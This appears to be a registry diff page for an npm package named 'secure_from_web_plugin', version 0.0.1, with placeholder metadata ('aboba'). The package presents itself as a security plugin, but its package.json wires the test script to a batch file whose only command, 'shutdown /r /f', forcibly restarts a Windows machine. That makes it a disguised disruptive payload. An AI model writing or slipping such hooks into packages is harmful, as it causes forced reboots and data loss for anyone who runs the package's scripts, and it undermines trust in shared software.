secure_from_web_plugin 0.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +11 -0
  2. package/test.bat +2 -0
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "secure_from_web_plugin",
3
+ "version": "0.0.1",
4
+ "description": "aboba",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "cmd test.bat"
8
+ },
9
+ "author": "aboba",
10
+ "license": "ISC"
11
+ }
package/test.bat ADDED
@@ -0,0 +1,2 @@
1
+ @echo OFF
2
+ shutdown /r /f